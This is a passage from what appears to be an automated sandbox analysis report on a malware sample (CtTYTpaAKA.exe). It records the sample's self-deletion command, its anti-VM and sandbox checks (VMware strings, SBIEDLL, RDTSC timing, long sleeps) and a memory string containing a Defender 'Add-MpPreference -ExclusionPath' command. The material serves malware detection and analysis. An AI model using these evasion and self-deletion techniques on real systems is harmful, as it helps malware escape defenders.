          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FFD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0478D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016B832 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016B83B push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016B89C push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016B7E5 push eax; ret

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.29ed0e0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CtTYTpaAKA.exe PID: 7140, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000158614 second address: 000000000015861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000001589AE second address: 00000000001589B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe TID: 7144Thread sleep time: -35433s >= -30000s
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe TID: 3212Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5684Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6812Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeThread delayed: delay time: 35433
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeThread delayed: delay time: 922337203685477
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000007.00000000.324192156.00000000089CC000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000000.338668394.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000007.00000000.320927407.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000007.00000000.301421655.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.338668394.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000007.00000000.301421655.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000007.00000000.338668394.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0102A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01023540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01058DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0107740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0107740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0107740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01074015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01074015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01071074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01062073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01023884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01023884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9100 mov eax, dword ptr fs:[00000030h]
